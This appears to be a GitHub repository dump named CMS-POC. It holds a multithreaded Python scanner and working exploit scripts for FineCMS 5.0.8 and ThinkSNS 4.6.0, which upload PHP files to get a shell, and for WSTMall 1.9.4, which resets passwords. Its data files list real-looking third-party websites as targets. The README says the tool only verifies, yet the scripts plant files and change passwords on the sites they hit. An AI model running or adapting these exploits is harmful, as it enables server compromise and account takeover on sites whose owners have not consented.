├── README.md
├── cms-poc.py
├── data
    ├── finecms.png
    ├── finecms.txt
    ├── wstmall.png
    └── wstmall.txt
└── script
    ├── finecms-5.0.8-getshell.py
    ├── finecms-5.0.8-getshell2.py
    ├── test.py
    ├── thinksns-4.6.0-getshell.py
    └── wstmall-1.9.4-resetpwd.py


/README.md:
--------------------------------------------------------------------------------
1 | # CMS-POC
2 | 
3 | CMS-POC只验证，不进行攻击
4 | 
5 | 例如：只验证SQL注入，不注出数据；只验证是否getshell，不提取shell地址
6 | 
7 | useage：cms-poc.py -s finecms-5.0.8-getshell.py -f finecms.txt
8 | 


--------------------------------------------------------------------------------
/cms-poc.py:
--------------------------------------------------------------------------------
 1 | from optparse import OptionParser
 2 | import threading
 3 | import requests
 4 | import imp
 5 | import os
 6 | import sys
 7 | import Queue
 8 | Q=Queue.Queue()
 9 | threads=[]
10 | lock=threading.Lock()
11 | def poc(module): 
12 |     while True:
13 |         lock.acquire()
14 |         if Q.qsize()>0:
15 |             target=Q.get()
16 |             lock.release()
17 |         else:
18 |             lock.release()
19 |             break
20 |         status=module.poc(target.rstrip('\n'))
21 |         if status:
22 |             lock.acquire()
23 |             print "[*] %s" %target.rstrip('\n')
24 |             lock.release()
25 | 
26 | def setMulThread(module):
27 |     for i in range(10):
28 |         t=threading.Thread(target=poc,args=(module,))
29 |         t.start()
30 |         threads.append(t)
31 |     for t in threads:
32 |         t.join()
33 | 
34 | def setImp(name):
35 |     print "[+] Loading custom script: %s" %name
36 |     script=os.getcwd()+'\\script\\'
37 |     fp, pathname, description = imp.find_module(os.path.splitext(name)[0], [script])
38 |     module=imp.load_module("_", fp, pathname, description)
39 |     if not hasattr(module,'poc'):
40 |         print "can't find poc function,please check your script"
41 |         sys.exit(0)
42 |     else:
43 |         return module
44 |     
45 | def singleThread(module):
46 |     module.poc()
47 | 
48 | def setPayloads():
49 |     print "[+] Loading payloads..."
50 |     with open(os.getcwd()+"\\data\\"+options.filename,'r') as file:
51 |             for line in file:
52 |                 Q.put(line)
53 |     
54 | if __name__=="__main__":
55 |     parser=OptionParser()
56 |     parser.add_option("-f","--file",dest="filename",help="load file of targets")
57 |     parser.add_option("-s","--script",dest="script",help="load script of attack")
58 |     parser.add_option("-t","--target",dest="target",help="single target")
59 |     (options,args)=parser.parse_args()
60 |     if options.filename:
61 |         module=setImp(options.script)
62 |         setPayloads()
63 |         setMulThread(module)
64 |     elif options.target:
65 |         module=setImp(options.script)
66 |         singleThread(module)
67 |     else:
68 |         print "please check your input format"
69 |        
70 | 
71 |         
72 |     
73 | 
74 | 
75 | 
76 | 
77 | 


--------------------------------------------------------------------------------
/data/finecms.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/404notf0und/CMS-POC/31dc49cd7df05a3c48799c1ea215b7a613c73a45/data/finecms.png


--------------------------------------------------------------------------------
/data/finecms.txt:
--------------------------------------------------------------------------------
1 | http://localhost
2 | http://test.0754.org
3 | http://demo.finecms.net/
4 | http://www.guorong.space/
5 | http://www.toycob.com/
6 | http://www.bolol.net/
7 | http://bolol.net/
8 | 


--------------------------------------------------------------------------------
/data/wstmall.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/404notf0und/CMS-POC/31dc49cd7df05a3c48799c1ea215b7a613c73a45/data/wstmall.png


--------------------------------------------------------------------------------
/data/wstmall.txt:
--------------------------------------------------------------------------------
1 | http://www.zxmrhospital.com
2 | http://demo.wstmall.com
3 | http://www.gcguang.com
4 | http://www.0sdsc.com
5 | http://www.lyhymh.cn
6 | http://gsh18.cn
7 | http://localhost


--------------------------------------------------------------------------------
/script/finecms-5.0.8-getshell.py:
--------------------------------------------------------------------------------
 1 | import random
 2 | import sys
 3 | import requests
 4 | def poc(target):
 5 |     payload="/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+"
 6 |     url=target+payload
 7 |     shell=target+'/uploadfile/member/0/0x0.php'
 8 |     try:
 9 |         result=requests.get(url,timeout=3)
10 |         verify=requests.get(shell,timeout=3)
11 |         if verify.status_code==200 and 'code' in verify.text:
12 |             return True
13 |     except Exception,e:
14 |         print e
15 |         
16 | 


--------------------------------------------------------------------------------
/script/finecms-5.0.8-getshell2.py:
--------------------------------------------------------------------------------
 1 | #Finecms version:5.0.8
 2 | #Author:404notfound
 3 | 
 4 | import random
 5 | import sys
 6 | import requests
 7 | def poc(url):
 8 |     username=random.randint(0,999999)
 9 |     seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
10 |     email = []
11 |     for i in range(8):
12 |         email.append(random.choice(seed))
13 |     email = ''.join(email)
14 |     #print email+"@"+email+".com"
15 |     #print username
16 |     
17 |     #step 1 register
18 |     #print "[+] register user"
19 |     register_url=url+"/index.php?s=member&c=register&m=index"
20 |     register_payload={"back":"","data[username]":username,"data[password]":"123456","data[password2]":"123456","data[email]":email+"@"+email+".com"}
21 |     #step 2 login
22 |     #print "[+] user login"
23 |     login_url=url+"/index.php?s=member&c=login&m=index"
24 |     login_payload={"back":"","data[username]":username,"data[password]":"123456","data[auto]":"1"}
25 |     #step 3 attack
26 |     #print "[+] loading payload"
27 |     vul_url=url+"/index.php?s=member&c=account&m=upload"
28 |     vul_payload={"tx":"data:image/php;base64,NDA0bm90Zm91bmQ8P3BocCBwaHBpbmZvKCk7Pz4="}
29 |     try:
30 |         s = requests.session()
31 |         resu=s.post(register_url,data=register_payload)
32 |         result=s.post(login_url,data=login_payload)
33 |         result2=s.post(vul_url,data=vul_payload).content
34 |         if "status" in result2:
35 |             return True
36 |         else:
37 |             return False
38 |     except Exception,e:
39 |         pass
40 |         #print e
41 |     #print "[+] ALL DONE"
42 |     #step 4 find shell path
43 |        
44 | #print poc("http://localhost")
45 |         
46 | 


--------------------------------------------------------------------------------
/script/test.py:
--------------------------------------------------------------------------------
1 | def poc(url):
2 |     print "Loading poc"
3 | 


--------------------------------------------------------------------------------
/script/thinksns-4.6.0-getshell.py:
--------------------------------------------------------------------------------
 1 | #ThinkSNS V4.6.0 GETSHELL
 2 | #Author:404notfound
 3 | import requests
 4 | import random
 5 | def poc():
 6 |     username=random.randint(0,9999669)
 7 |     seed = "abcdefghijklmnopqrstuvwxyz"
 8 |     email=''.join(random.choice(seed) for i in range(8))
 9 |     email=email+"@"+email+".com"
10 |     
11 |     s=requests.session()
12 |     
13 |     #step1 registe
14 |     register_url="http://localhost/index.php?app=public&mod=Register&act=doStep1"
15 |     register_poc={"invate":'',"invate_key":'',"regType":"email","email":email,"uname":username,"password":"123456","repassword":"123456"}
16 |     register_res=s.post(register_url,data=register_poc)
17 |     
18 |     #step2 login
19 |     for i in range(2):
20 |         headers={'referer':'http://localhost/index.php'}
21 |         login_url="http://localhost//index.php?app=public&mod=Passport&act=doLogin"
22 |         login_poc={"login_email":email,"login_password":"123456","login_remember":"1"}
23 |         login=s.post(login_url,data=login_poc,headers=headers)
24 |         #step3 load poc
25 |         attack_url='http://localhost/index.php?app=public&mod=attach&act=ajaxUpload'
26 |         headers={'referer':'http://localhost/index.php'}
27 |         files={'file':open('c://Python27/1.PHP','rb')}
28 |         attack=s.post(attack_url,files=files,headers=headers)
29 |         #step4 find verified information
30 |         if "save_name" in attack.content:
31 |             return True
32 | 
33 | #poc()
34 | 


--------------------------------------------------------------------------------
/script/wstmall-1.9.4-resetpwd.py:
--------------------------------------------------------------------------------
 1 | #coding=utf8
 2 | #precodition：
 3 | #use C:\phpStudy\WWW\Apps\Home\Action\UsersAction.class.php line 352 encrypt function
 4 | #"$key = $keyFactory->encrypt("0_".session('findPass.userId')."_".time(),C('SESSION_PREFIX'),30*60);"
 5 | #produce payload in real time to replace payload param in poc function
 6 | 
 7 | import os
 8 | import requests
 9 | 
10 | def poc(url):
11 |     payload='hIqMqX6leayznZXcsotyloTes5mxubfZr3x-qIR7otyEh3Rv'#####need to be replaced
12 |     url=url+"/index.php?m=Home&c=Users&a=toResetPass&key="+payload
13 |     url2=url+"/index.php?m=Home&c=Users&a=findPass"
14 |     s=requests.Session()
15 |     reset=s.get(url)
16 |     poc={'step':'3','loginPwd':'123456','repassword':'123456'}
17 |     result=s.post(url2,data=poc)
18 |     if 'Powered' in result.text:
19 |         #print "[+]reset successfully"
20 |         return True
21 |       
22 | #poc('http://demo.wstmall.com')
23 | 
24 |         
25 | 
26 | 


--------------------------------------------------------------------------------